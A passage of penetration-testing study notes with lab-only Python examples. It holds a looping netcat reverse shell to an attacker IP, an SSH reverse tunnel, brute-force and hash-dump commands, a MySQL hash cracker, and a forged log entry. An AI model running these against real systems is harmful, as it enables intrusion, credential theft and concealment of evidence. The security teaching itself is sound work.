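# the ports found open, against a throwaway service on 127.0.0.1.
import socket
import threading

FAKE_BANNER = b"SSH-1.99-OpenSSH_4.3\r\n"   # constructed sample banner


def start_fake_service(banner: bytes = FAKE_BANNER):
    """Listen on a random 127.0.0.1 port and send `banner` to every client."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed: stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def free_port() -> int:
    """Find a port nobody is listening on (the 'closed' sample)."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """Classify each port the way Nmap reports a connect scan.

    open     : connect() completed the three-way handshake, so the service's
               accept() fired and the connection is logged (the noise -sT
               makes that a SYN scan avoids)
    closed   : the host answered the SYN with RST (ECONNREFUSED)
    filtered : nothing came back before the timeout, or an ICMP error did
    """
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            results[port] = "open"
        except ConnectionRefusedError:
            results[port] = "closed"
        except OSError:              # socket.timeout and ICMP-driven errors
            results[port] = "filtered"
        finally:
            s.close()
    return results


def _recv_quiet(sock: socket.socket, size: int = 1024) -> bytes:
    try:
        return sock.recv(size)
    except socket.timeout:
        return b""


def grab_banner(host: str, port: int, timeout: float = 1.0,
                probe: bytes = b"\r\n") -> str:
    """Read whatever the service volunteers on connect; if it stays quiet,
    send a harmless probe (the 'random data' step for an unknown service)
    and read again."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        data = _recv_quiet(s)
        if not data:
            s.sendall(probe)
            data = _recv_quiet(s)
    return data.decode("ascii", errors="replace").strip()


if __name__ == "__main__":
    srv, port = start_fake_service()
    for p, state in connect_scan("127.0.0.1", [port, free_port()]).items():
        line = f"{p}/tcp {state}"
        if state == "open":
            line += "  " + grab_banner("127.0.0.1", p)
        print(line)
    srv.close()
```

Run against a real host the same code is exactly as loud as nmap -sT: every open port sees a completed connection, which is why the SYN scan exists.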
    4. Vulnerability Identification
      1. http://nvd.nist.gov/
      2. If we were simply conducting a risk assessment without conducting a penetration test, this is where we would probably stop
  7. Vulnerability Exploitation
    1. Introduction
      1. In this chapter we let automated tools do what we did by hand in the previous chapter
      2. Without understanding how to gather application and OS version information yourself, you cannot accurately understand how automated tools gather the same information
      3. If we want to call ourselves professionals, we cannot simply let our tools do our work for us
      4. four steps
        1. Find proof of concept code/tool
        2. Test proof of concept code/tool
          1. test the proof-of-concept code/tool against a test server first
          2. we really cannot know what will happen when we launch the exploit unless we examine the code first or run it in a test environment
          3. an exploit can have different results, including crashing the target and losing all of its data and functionality
        3. Write your own proof of concept code/tool
        4. Use proof of concept code/tool against target
    2. Automated Tools
      1. The top 10 vulnerability scanners
        1. Nessus (commercial; closed source since 2005, with a free limited-use licence)
        2. OpenVAS (open source, forked from the last open Nessus release)
        3. Core Impact (commercial)
        4. Nexpose (commercial)
        5. GFI LanGuard (commercial)
        6. QualysGuard (commercial)
        7. MBSA (free Microsoft tool, closed source, since retired)
        8. Retina (commercial)
        9. Secunia PSI (free, closed source, since discontinued)
        10. Nipper (commercial)
      2. Vulnerability exploitation tools
        1. Metasploit (open source/commercial)
        2. Core Impact (commercial)
        3. sqlmap (open source)
        4. Canvas (commercial)
        5. Netsparker (commercial)
      3. Nmap Scripts
        1. /usr/share/nmap/scripts
        2. -A runs the "default" script category together with OS detection, version detection and traceroute; a specific script or category is chosen with --script
        3. nmap -A 10.0.3.125
      4. Default Login Scans
        1. Frequent issue: the use of default or weak passwords on applications
        2. There are multiple tools we can use: Medusa, Hydra...
        3. medusa -h <targetIP> -u root -p password -e ns -O mysql.medusa.out -M mysql
        4. -e ns additionally tries an empty password (n) and the username as the password (s); -O writes results to a file; -M selects the service module
      5. OpenVAS
      6. JBroFuzz
        1. Fuzzing is a process where malformed or random data is passed to an application in the hope that an anomaly (crash, hang, unexpected error) will be detected
        2. Fuzzing can take quite a while to complete
        3. We can use a fuzzer whenever we discover a place to insert user-supplied data in an application
      7. Metasploit
        1. FTP
          1. use auxiliary/scanner/ftp/anonymous
          2. auxiliary/scanner/ftp/ftp_login
        2. Simple Mail Transfer Protocol
          1. can be used to identify usernames on a target system or within the organization
          2. User enumeration via SMTP (the VRFY, EXPN and RCPT TO commands reveal whether a mailbox exists)
          3. use auxiliary/scanner/smtp/smtp_enum
          4. show options
          5. set RHOSTS 192.168.1.123
          6. run
          7. Once we have this information, we can attempt to find passwords for each user
          8. send bogus e-mails as the root user (social engineering)
          9. hardened mail servers disable VRFY or answer 252 for every name, in which case the module finds nothing
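The VRFY exchange that smtp_enum automates, as an added example showing both sides of the conversation; this is neither Metasploit's code nor the page's. The mailbox names, the server greeting and the hardened mode (252 to every VRFY) are constructed assumptions.

```python
# Added example (not from the original page or Metasploit): SMTP user
# enumeration with VRFY against a tiny fake MTA on 127.0.0.1.
import socket
import threading

KNOWN_MAILBOXES = {"root", "msfadmin", "postmaster"}   # constructed


def start_fake_smtp(known=KNOWN_MAILBOXES, verify_enabled=True):
    """Minimal SMTP responder. It answers VRFY like a classic sendmail
    (250 known / 550 unknown); with verify_enabled=False it answers 252
    to everything, which is how hardened MTAs defeat this enumeration."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def handle(conn):
        with conn, conn.makefile("rb") as rd:
            conn.sendall(b"220 mail.example.test ESMTP\r\n")
            for raw in rd:
                verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
                verb = verb.upper()
                if verb in ("HELO", "EHLO"):
                    conn.sendall(b"250 mail.example.test\r\n")
                elif verb == "VRFY":
                    local = arg.split("@")[0]
                    if not verify_enabled:
                        conn.sendall(b"252 Cannot VRFY user, but will try delivery\r\n")
                    elif local in known:
                        conn.sendall(f"250 <{local}@example.test>\r\n".encode())
                    else:
                        conn.sendall(b"550 User unknown\r\n")
                elif verb == "QUIT":
                    conn.sendall(b"221 Bye\r\n")
                    return
                else:
                    conn.sendall(b"502 Command not implemented\r\n")

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:              # listener closed
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def smtp_enum(host, port, candidates, timeout=3.0):
    """One session, one VRFY per candidate. Returns {name: 'valid' |
    'invalid' | 'unknown'}; 'unknown' means the server refused to say
    (252), so RCPT TO probing or another vector is needed."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s, \
            s.makefile("rb") as rd:
        rd.readline()                                  # 220 greeting
        s.sendall(b"HELO scanner.example.test\r\n")
        rd.readline()                                  # 250
        for name in candidates:
            s.sendall(f"VRFY {name}\r\n".encode())
            code = rd.readline()[:3]
            if code == b"250":
                results[name] = "valid"
            elif code in (b"550", b"551", b"553"):
                results[name] = "invalid"
            else:
                results[name] = "unknown"
        s.sendall(b"QUIT\r\n")
    return results
```

Feed smtp_enum the login list built from the target's e-mail addresses; every "valid" entry goes straight into the password-attack phase.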
        3. Server Message Block
          1. SMB user enumeration
          2. use auxiliary/scanner/smb/smb_enumshares (shares; smb_enumusers in the same directory lists the accounts)
          3. Brute-force of the "msfadmin" password
          4. Creating a link to a remote file share
          5. use auxiliary/admin/smb/samba_symlink_traversal
          6. show options
          7. set SMBSHARE tmp
          8. exploit
          9. Logging onto the remote system's /root directory: the module creates a symlink inside the writable share that points at the root of the filesystem, which works only against Samba servers with "wide links" enabled (the default in older releases)
        4. Network File Shares
          1. We can scan for exported network file shares (NFS)
          2. using the "nfsmount" module in Metasploit
          3. use auxiliary/scanner/nfs/nfsmount
          4. show options
          5. set RHOSTS <targetIP>
          6. run
          7. an export allowed for "*" can be mounted from the attack system, giving us its files (and, with no_root_squash set, root on the share)
        5. MySQL
          1. auxiliary/scanner/mysql/mysql_login module
          2. grab the hashes stored in the MySQL
          3. use auxiliary/scanner/mysql/mysql_hashdump
          4. show options
          5. set RHOSTS <targetIP>
          6. run
        6. PostgreSQL
          1. postgres_login module
          2. auxiliary/scanner/postgres/postgres_schemadump
          3. Metasploit also has modules for Oracle as well
        7. VNC
          1. use auxiliary/scanner/vnc/vnc_none_auth
          2. show options
          3. set RHOSTS <targetIP>
          4. run
          5. the module reports VNC servers that accept the "None" authentication type, i.e. no password at all
      8. Never trust a single tool; use more than one for each task
    3. Exploit Code
      1. Internet Sites
        1. the repository of exploits: www.exploit-db.com
        2. So, which exploits should we attempt? All of them, but only after reading each one and testing it in the lab first (the four steps above)
  8. Local System Attacks
    1. System Exploitation
      1. Internal Vulnerabilities
        1. only possible if local access is somehow obtained first
        2. an effective method of elevating privileges on a target system
      2. Sensitive Data
        1. We may not always obtain administrative permissions
        2. gather sensitive information that shouldn’t be available to unauthorized users
        3. Ex: we successfully downloaded /etc/shadow
        4. Once we have access to a command prompt, we need to take a bit of time and really explore the server for useful data
      3. Meterpreter
        1. Once we have Meterpreter running, we can explore the exploited system.
        2. It is possible to "jump" (migrate) from the current process into one running as a more privileged user
    2. Shells and Reverse Shells
      1. Netcat Shell
        1. To use netcat as a backdoor we need to have a way to direct all communication through netcat into a shell or command prompt
        2. Nmap scan against the Hackerdemia system => nmap 192.168.1.123
        3. The port we will look at is port 1337
        4. When a connection is made, netcat executes the bash shell, allowing us to interact with the system
        5. Permissions are inherited whenever a process is launched
        6. the bash shell inherits the privileges of whoever started the netcat process; here that was the system's own startup script, so the shell runs as root
        7. nc 192.168.1.123 1337
          1. whoami => root
          2. pwd => /
          3. ifconfig => eth0, lo ...
          4. uname -a => Linux slax 2.6.16
        8. We now have a backdoor that will be accessible as long as the startup script keeps netcat running
      2. Netcat Reverse Shell
        1. A reverse shell will often prevent firewalls from severing our connection: the victim initiates an outbound connection to us, and outbound traffic is rarely filtered as strictly as inbound
        2. Reverse shell using netcat (runs on the victim; the loop reconnects whenever the connection drops, pausing between attempts so it does not spin)
          1. #!/bin/sh
          2. while true; do
          3. nc 192.168.1.10 1337 -e /bin/sh
          4. sleep 60
          5. done
        3. On the attack system, start the listener first: nc -l -p 1337 (-e exists in traditional netcat and in ncat but not in the OpenBSD build, where a named pipe or socat is needed instead)
        4. Because we are root on the attack system, it really doesn't matter which port we use (ports below 1024 need root to bind)
        5. everything we send to the target system will be in cleartext => netcat does not encrypt the communication stream
        6. If we create a backdoor during a penetration test, we must record it so that we can remove it later
    3. Encrypted Tunnels
      1. An SSH tunnel will allow us to push tools and additional exploits onto the victim system without network monitoring being able to see the contents
      2. Addition of iptables rules to block any incoming traffic from the attack system (simulating a host firewall that forces us to rely on a connection the victim opens outbound to us)
    4. Adding a Host Firewall (Optional)
      1. Setting Up the SSH Reverse Shell
        1. nc 192.168.1.100 22
        2. SSH-1.99-OpenSSH_4.3
        3. root
        4. Protocol mismatch.
        5. connecting with netcat shows the SSH version banner; typing anything that is not an SSH identification string makes the daemon drop us with "Protocol mismatch", which confirms a real SSH server is listening on the attack system
      2. Setting Up Public/Private Keys
        1. on the attack server, first create a public/private RSA key pair with an empty passphrase (ssh-keygen -t rsa), which allows us to automate the connection without a prompt
        2. append the id_rsa.pub file to the authorized_keys file on our attack server
          1. cat id_rsa.pub >> /root/.ssh/authorized_keys
        3. create a netcat listener that pushes the private key (id_rsa) to the victim when it connects; the victim can then authenticate to the attack server without a password
        4. from the victim, open a reverse tunnel (the ssh -R option) back to the attack server so that port 44444 there forwards to the victim's own SSH port 22
        5. on the attack server, connect an SSH client to the local listening port: ssh -p 44444 localhost
        6. caveat: a passphrase-less private key sitting on a compromised host is a credential for our attack server; restrict it in authorized_keys (no-pty, permitopen, a forced command) and remove it when the engagement ends
      3. Launch the Encrypted Reverse Shell
    5. Other Encryption and Tunnel Methods
      1. Cryptcat
        1. twofish encryption algorithm
        2. both systems must possess the same cipher key
        3. http://cryptcat.sourceforge.net
      2. Matahari
        1. written in Python
        2. uses the ARC4 encryption algorithm
        3. ARC4 (RC4) is now a deprecated cipher, but it still keeps our traffic out of plain sight in a penetration test environment
        4. http://matahari.sourceforge.net
      3. Proxytunnel
        1. tunnels a connection through an HTTP(S) proxy, so OpenSSH can reach our attack system from inside a network that only allows proxied web traffic
        2. shell access to the victim server
        3. http://proxytunnel.sourceforge.net
      4. Socat
        1. can encrypt the traffic using OpenSSL
        2. www.dest-unreach.org/socat/
      5. Stunnel
        1. an SSL/TLS wrapper for arbitrary TCP connections
        2. https://stunnel.org/
  9. Privilege Escalation
    1. Password Attacks
      1. Remote Password Attacks
        1. Before we begin, we need to create and gather dictionaries
        2. Create additional dictionaries according to our current target
        3. De-ICE 1.100
          1. on the target's web page we see a list of employee e-mail addresses
          2. we can use these e-mails to build a username list
          3. We may be able to avoid adding variations if we already know the pattern used within an organization to assign usernames to employees
          4. we have a partial list of potential login names:
          5. root
          6. adamsa
          7. banterb
          8. ...
          9. we conduct an Nmap scan against the target system to find the services worth attacking
          10. Weak password for username "bbanter" (Hydra); note the working form is first initial plus last name, the reverse of our first guess
          11. "bbanter" has very limited access to the system
          12. Nothing useful on the system
          13. attack against "aadams", built with the same convention
          14. we will be using the "rockyou.txt" wordlist available at SkullSecurity.org
          15. Successful dictionary attack
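Building the login list from scraped names and then, once Hydra confirms "bbanter", inferring the convention and regenerating the list for everyone else, as an added example that is not from the page or the De-ICE image. The employee names (apart from the Adams and Banter entries the page implies), the convention table and the extra fixed accounts are constructed assumptions.

```python
# Added example (not from the original page): login candidates from names,
# and narrowing them to one convention once a login is confirmed.
import re

# Constructed employee list in "First Last" form, as scraped from a web page.
EMPLOYEES = ["Adam Adams", "Bob Banter", "Chad Coffee", "Marie Mary"]

# Common naming conventions; each maps (first, last) -> login.
CONVENTIONS = {
    "flast":      lambda f, l: f[0] + l,          # aadams, bbanter
    "lastf":      lambda f, l: l + f[0],          # adamsa, banterb
    "first.last": lambda f, l: f + "." + l,
    "first_last": lambda f, l: f + "_" + l,
    "firstlast":  lambda f, l: f + l,
    "last":       lambda f, l: l,
    "first":      lambda f, l: f,
}


def _normalise(name: str):
    """Lower-case, strip punctuation, return (first, last)."""
    parts = re.sub(r"[^a-z ]", "", name.lower()).split()
    return parts[0], parts[-1]


def candidates(name: str) -> list:
    """Every convention's variant for one person, de-duplicated, order kept."""
    first, last = _normalise(name)
    seen = []
    for make in CONVENTIONS.values():
        login = make(first, last)
        if login not in seen:
            seen.append(login)
    return seen


def build_wordlist(employees=EMPLOYEES, extra=("root", "admin")) -> list:
    """Initial login list for Hydra: fixed accounts plus every variant."""
    logins = list(extra)
    for name in employees:
        logins.extend(c for c in candidates(name) if c not in logins)
    return logins


def infer_convention(confirmed_login: str, employees=EMPLOYEES):
    """Given a login that worked, find the convention that produced it."""
    for name in employees:
        first, last = _normalise(name)
        for key, make in CONVENTIONS.items():
            if make(first, last) == confirmed_login:
                return key
    return None


def apply_convention(key: str, employees=EMPLOYEES) -> list:
    """One login per person once the pattern is known; this is the short list
    the page says lets us skip the variations."""
    make = CONVENTIONS[key]
    return [make(*_normalise(n)) for n in employees]
```

With "bbanter" confirmed, infer_convention returns "flast" and apply_convention yields "aadams" directly, so the second attack needs one username instead of seven guesses per person.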
      2. Local Password Attacks
        1. dependent on our ability to capture hashes from a compromised system
        2. Hashes from Metasploitable
        3. we launch JTR (John the Ripper) against the hash file using the rockyou.txt dictionary
        4. “msfadmin” username has a password of “msfadmin”
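A dictionary attack with mangling rules against the hashes mysql_hashdump pulls out of mysql.user (the Metasploit MySQL section above) and the JTR run described here, as one added example; it is neither John the Ripper nor Metasploit code. The account names, their passwords and the five-word stand-in for rockyou.txt are constructed, and the hashes are computed from those passwords so the example checks itself offline.

```python
# Added example (not from the original page, Metasploit or John): cracking
# MySQL native password hashes ("*" + SHA1(SHA1(pw)) in uppercase hex) with
# a word list and a few John-style mangling rules.
import hashlib
from itertools import product


def mysql_native_hash(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by SHA1(SHA1(pw)) as upper hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed dump in "user:hash" form, what mysql_hashdump writes to loot.
SAMPLE_DUMP = [
    "root:" + mysql_native_hash("Password1"),
    "msfadmin:" + mysql_native_hash("msfadmin"),
    "backup:" + mysql_native_hash("x7!Qp#v9Lw2"),   # not in any word list
]

# Constructed stand-in for the first lines of rockyou.txt.
WORDLIST = ["123456", "password", "letmein", "msfadmin", "toor"]

# A few of the rules John applies in wordlist mode.
CASE_RULES = [str.lower, str.capitalize, str.upper]
SUFFIXES = ["", "1", "123", "!"]


def mangle(word: str):
    """Yield every case/suffix variant of one dictionary word."""
    for case, suffix in product(CASE_RULES, SUFFIXES):
        yield case(word) + suffix


def crack(dump, wordlist=WORDLIST) -> dict:
    """Map every cracked user to its plaintext; uncracked users are absent.

    The scheme is unsalted, so each candidate is hashed once and looked up
    against every target instead of once per target.
    """
    targets = {}
    for line in dump:
        user, _, digest = line.partition(":")
        targets.setdefault(digest.upper(), []).append(user)
    found = {}
    for word in wordlist:
        for cand in mangle(word):
            for user in targets.get(mysql_native_hash(cand), []):
                found.setdefault(user, cand)
    return found
```

The unsalted double-SHA1 is why a short rockyou run recovers "msfadmin" in seconds; the same code against a salted scheme such as the SHA-512 crypt in /etc/shadow would have to hash every candidate once per account.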
      3. Dictionary Attacks
    2. Network Packet Sniffing
      1. MITM attack using Ettercap
      2. The MITM attack is totally independent from the sniffing
      3. The aim of the attack is to hijack packets and redirect them to ettercap
      4. You can choose the MITM attack that you prefer and also combine some of them to perform different attacks at the same time
      5. methods by which network traffic can be redirected to us and captured
        1. Domain name system (DNS)—Cache poisoning
        2. DNS forgery
        3. User interface (UI) redressing
        4. Border Gateway Protocol (BGP) hijacking
        5. Port Stealing
        6. Dynamic Host Configuration Protocol (DHCP) spoofing
        7. Internet Control Message Protocol (ICMP) redirection
        8. MITM
    3. Social Engineering
      1. attacks
        1. Shoulder surfing
        2. Physical access to workstations
        3. Masquerading as a user
        4. Masquerading as a monitoring staff
        5. Dumpster diving
        6. Handling (finding) sensitive information
        7. Reverse social engineering
      2. Baiting
        1. uses computer media to entice a victim into installing malware
        2. Ex: leave a CD-ROM disk in a public place
        3. Rely on natural human curiosity when presented with an unknown
      3. Phishing
        1. fake e-mails, which request a user to connect to an illegitimate site
        2. Some phishing attacks target victims by phone instead (vishing)
      4. Pretexting
        1. inventing a scenario to convince victims to divulge information they should not divulge
    4. Manipulating Log Data
      1. User Login
        1. Modifying the log file and matching timestamps: append a forged entry whose timestamp is slightly ahead of the current time, so it lands in sequence with the genuine entries that follow
          1. root@slax:~# more /var/log/secure
          2. root@slax:~# date
          3. Wed Apr 29 11:26:30 GMT 2009
          4. root@slax:~# echo 'Apr 29 11:28:08 (none) su[31337]: + vc/1 root-root' >> /var/log/secure
          5. root@slax:~# date
          6. Wed Apr 29 11:28:08 GMT 2009
          7. the forged line still differs from its neighbours (hostname, PID, TTY), which is exactly what a careful reviewer looks for
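The checks an investigator would run over /var/log/secure to catch an entry like the forged su line above, as an added example that is not from the page. The sample log lines are constructed; the hostname slax and the forged "(none) su[31337]" line follow the page, and the neighbouring PIDs and the 5000 jump threshold are assumptions.

```python
# Added example (not from the original page): three tamper heuristics over
# syslog-style lines: timestamps running backwards, a host field that differs
# from the rest of the file, and a PID far from its neighbours'.
import re
from datetime import datetime

# Syslog line: "Apr 29 11:28:08 host prog[pid]: message" (pid is optional).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>[\w./-]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)

# Constructed sample of a Slax /var/log/secure; line 4 is the page's forged entry.
SAMPLE_SECURE = """\
Apr 29 11:20:02 slax sshd[2910]: Accepted password for bbanter from 192.168.1.10 port 50211 ssh2
Apr 29 11:21:47 slax su[2934]: + pts/0 bbanter-root
Apr 29 11:24:10 slax sshd[2951]: Accepted password for aadams from 192.168.1.10 port 50230 ssh2
Apr 29 11:28:08 (none) su[31337]: + vc/1 root-root
Apr 29 11:23:55 slax sshd[2970]: Failed password for root from 192.168.1.10 port 50241 ssh2
Apr 29 11:30:12 slax sshd[2988]: Accepted publickey for root from 192.168.1.10 port 50260 ssh2
"""


def parse(text, year=2009):
    """Turn log text into dicts (line, raw, ts, host, prog, pid). Syslog
    omits the year, so the caller supplies it."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(raw)
        if not m:
            entries.append({"line": n, "raw": raw, "ts": None, "host": None, "pid": None})
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        entries.append({"line": n, "raw": raw, "ts": ts, "host": m["host"],
                        "prog": m["prog"], "pid": int(m["pid"]) if m["pid"] else None})
    return entries


def audit(entries, pid_jump=5000):
    """Return sorted (line, reason) pairs for entries worth a closer look."""
    findings = [(e["line"], "unparseable line") for e in entries if e["ts"] is None]
    parsed = [e for e in entries if e["ts"] is not None]
    counts = {}
    for e in parsed:
        counts[e["host"]] = counts.get(e["host"], 0) + 1
    usual_host = max(counts, key=counts.get) if counts else None
    latest = None
    for i, e in enumerate(parsed):
        if latest is not None and e["ts"] < latest:
            findings.append((e["line"], "timestamp earlier than a previous entry"))
        latest = e["ts"] if latest is None else max(latest, e["ts"])
        if e["host"] != usual_host:
            findings.append((e["line"], f"host {e['host']!r} differs from usual {usual_host!r}"))
        if e["pid"] is not None:
            neighbours = [x["pid"] for x in parsed[max(0, i - 2):i + 3]
                          if x is not e and x["pid"] is not None]
            if neighbours and min(abs(e["pid"] - p) for p in neighbours) > pid_jump:
                findings.append((e["line"], f"pid {e['pid']} far from neighbouring pids"))
    return sorted(findings)
```

None of these is proof on its own (PIDs wrap, clocks get corrected, hostnames change), but an entry that trips two of them at once, as line 4 does, is where the timeline review starts; forwarding logs to a remote collector at write time is what makes this kind of edit visible in the first place.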
      2. Application Logs
        1. Take a look at the /var/log/messages file
      3. Two types of logs
        1. System generated
        2. Application generated
      4. Two options
        1. Delete the entire log (crude: a missing or truncated log is itself an indicator)
        2. Modify the content (remove or forge individual entries, as above)
    5. Hiding Files
      1. Hiding Files in Plain Sight
        1. we need to camouflage our script
        2. change the name of the file to something that blends in with the system's own files
      2. Hiding Files Using the File System
      3. Hiding Files in Windows
        1. By adding the hidden attribute to virus.exe it disappears from a default Explorer or dir listing
        2. any application launched in Microsoft Windows can still be detected by looking at the processes running on the system
  10. Targeting Support Systems
    1. Database Attacks
      1. first step : Nmap scan, using the “-A” flag
      2. take a look at the available exploits and modules available on Metasploit
      3. First thing to check: weak passwords
      4. We can use our own dictionaries to conduct a brute-force attack
    2. Network Shares
  11. Targeting The Network
    1. Wireless Network Protocols
      1. Wi-Fi Protected Access Attack
        1. Put the wireless interface into monitor mode (airmon-ng) so it captures all frames, not only those addressed to it
        2. airodump-ng
          1. Basic Service Set Identifier (BSSID, the access point's MAC address)
          2. Extended Service Set Identifier (ESSID, the network name)
          3. Station (client) MAC addresses
        3. aireplay-ng
          1. deauthenticate connected clients from a target access point, forcing the clients to reconnect and reauthenticate, which makes them send the WPA four-way handshake again so we can capture it
        4. Dictionary attack against the captured handshake
        5. aircrack-ng
          1. derives a key from each candidate passphrase and checks it against the captured handshake; the pre-shared key itself is never transmitted, so this only succeeds when the passphrase is in our dictionary
      2. WEP Attack
        1. Cracking WEP involves capturing as many IVs (initialization vectors) as possible between the clients and the AP
          1. the IV is a 24-bit value sent in cleartext in every frame; it is prepended to the static WEP key to seed RC4 for that frame
          2. its purpose is to vary the keystream from frame to frame even though the key itself never changes
        2. With only 2^24 possible values, IVs are reused on a busy network within hours, and certain "weak" IVs leak bytes of the key
        3. If enough IVs are captured, the key can be recovered statistically (aircrack-ng's PTW attack needs on the order of tens of thousands of data frames)
        4. WEP encryption can be broken regardless of the key's complexity, because the flaw is in the protocol, not in the key
    2. Simple Network Management Protocol
      1. UDP scan (SNMP listens on UDP 161, so a TCP-only scan misses it)
      2. Brute-force attack on SNMP community strings (try "public" and "private" first)
      3. "snmpenum.pl" script to dump system, user and process information from the target
      4. Modifying the hostname using "snmpset", which requires a read-write community string
  12. Web Apps Attack Techniques
    1. SQL Injection
      1. technique for manipulating web applications that build SQL queries from user input and pass them to an RDBMS, letting the attacker read, alter, insert or delete data in the database
      2. SQL injections work more often than they should
      3. SELECT * FROM user_data WHERE last_name = 'Tom' OR '1' = '1'
        1. intended: display the user_data row for the user Tom
        2. with the injected OR '1' = '1' the WHERE clause is always true, so it gives us everything
      4. SQL injections are perfect examples of weaknesses in integrity controls; the fix is to bind user input as query parameters rather than concatenate it into the SQL text
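The query above the way a web application would build it, once by string concatenation and once with a bound parameter, as an added example that is not from the page, run against an in-memory SQLite table whose columns and rows are constructed.

```python
# Added example (not from the original page): the injectable query and its
# parameterised form, side by side, against a constructed SQLite table.
import sqlite3

SAMPLE_ROWS = [  # constructed user_data table
    (101, "Tom", "4111111111111111"),
    (102, "Smith", "4222222222222222"),
    (103, "Snow", "4333333333333333"),
]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_data (userid INTEGER, last_name TEXT, cc_number TEXT)")
    db.executemany("INSERT INTO user_data VALUES (?, ?, ?)", SAMPLE_ROWS)
    return db


def lookup_vulnerable(db, last_name: str) -> list:
    """The page's query built from user input. A value of  Tom' OR '1'='1
    closes the quoted literal and appends an always-true condition, so the
    statement becomes exactly the one shown above and returns every row."""
    sql = f"SELECT * FROM user_data WHERE last_name = '{last_name}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, last_name: str) -> list:
    """Same query with the value bound as a parameter: the driver never lets
    the input become part of the SQL grammar, so the quote is just data and
    the injected string matches no row."""
    return db.execute(
        "SELECT * FROM user_data WHERE last_name = ?", (last_name,)
    ).fetchall()
```

Escaping or filtering quotes is a weaker fix than binding: it has to be right for every database dialect and every place the value is used, while a bound parameter cannot change the query's structure at all.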
    2. Cross-Site Scripting
      1. Gather the session information of a victim user, e.g. the administrator
      2. It is sometimes possible to conduct a replay attack using that session information (present the stolen session ID and the application treats us as the victim)
      3. Injecting an "alert" script into the database (stored XSS: the payload is saved with the record)
      4. Once saved, an alert window with the session ID appears for whoever views the record
      5. After we have successfully injected our script, we wait until someone else visits Tom's information
      6. In a real attack the JavaScript (or any other language the browser runs from HTML) sends the session ID to a server we control instead of displaying it
    3. Web Application Vulnerabilities
      1. How
        1. Identify applications running on ports, usually 80 or 443 for a web app
        2. Find version information (if possible)
        3. Look for exploits on the Internet.
        4. Run the exploits against the target application
      2. Top 10 attack vectors (OWASP Top 10, 2013 edition)
        1. Injection (including SQL injection)
        2. Broken Authentication and Session Management
        3. Cross-Site Scripting (XSS)
        4. Insecure Direct Object References
        5. Security Misconfiguration
        6. Sensitive Data Exposure
        7. Missing Function Level Access Control
        8. Cross-Site Request Forgery (an attack that targets a victim's browser)
        9. Using Known Vulnerable Components
        10. Unvalidated Redirects and Forwards
    4. Automated Tools
      1. CORE IMPACT
      2. HP WebInspect
      3. Nikto
      4. Paros Proxy
      5. Burp Suite Pro
        1. A proxy server
        2. A spider tool
        3. A vulnerability scanner
        4. A repeater tool
        5. A sequencing tool
  13. Reporting Results
    1. What Should You Report?
      1. Out of Scope Issues
        1. Findings that are discovered during the course of the pentest on a target
        2. Findings that indicate systemic flaws in the overall architecture
      2. Findings
        1. We need to include what was not found as well
        2. There will be times when a finding needs to be reported on immediately.
      3. Solutions
        1. Believe it or not, clients like to be told what to do.
      4. Manuscript Preparation
        1. Title Page
          1. Introduce the topic of the report
          2. Introduce author and the penetration test team’s organization
          3. Great place to brandish logos and make everything look appealing
          4. Primary goal: Provide a clear message of what the report is about
        2. Abstract
          1. The abstract = The executive report
          2. The executive summary should be no longer than one page and contain concise analysis and findings
        3. Text
          1. elements
          2. Description of the target network or system
          3. Vulnerability findings
          4. Remediation
          5. we should include graphical representation of the architecture and include descriptions of each element
          6. Vulnerability findings and remediation options should be meshed together
        4. References
          1. we should provide the reader Internet references regarding the vulnerabilities
          2. The National Vulnerability Database, located at http://nvd.nist.gov, is a good choice
        5. Appendices
          1. At least two appendices
          2. a list of definitions
          3. The step-by-step events surrounding each vulnerability exploitation
    2. Initial Report
      1. Peer Reviews
        1. We all make mistakes, especially when writing.
      2. Fact Checking
        1. We can generate a list of questions that we need to answer, or we can send a copy of the initial report to the client so that they can verify all statements within the document
      3. Metrics
        1. Nessus
        2. CORE IMPACT
    3. Final Report
      1. Peer Reviews
        1. it is often prudent to conduct additional peer reviews on the report
        2. This is our last chance to correct any grammatical errors
      2. Documentation
        1. Most customers are comfortable with receiving printed reports
        2. Microsoft Word documents, or Adobe’s Portable Document Format (PDF)
        3. If we already have a digital certificate, we can use it to sign our document
        4. Selecting the file for inclusion in a security envelope (Adobe Acrobat's encrypted wrapper for delivering the report)
  14. Hacking as a career
    1. Career Paths
      1. Network Architecture
        1. make sure that you understand as many different facets of network architecture as you can if you want to become a pentest engineer
        2. Learn about
          1. Communication protocols
          2. VoIP
          3. routers
          4. switches
          5. IDS
          6. firewall
          7. wireless
          8. Transmission Control Protocol (TCP)
          9. and anything else you can think of
      2. System Administration
      3. Applications and Databases
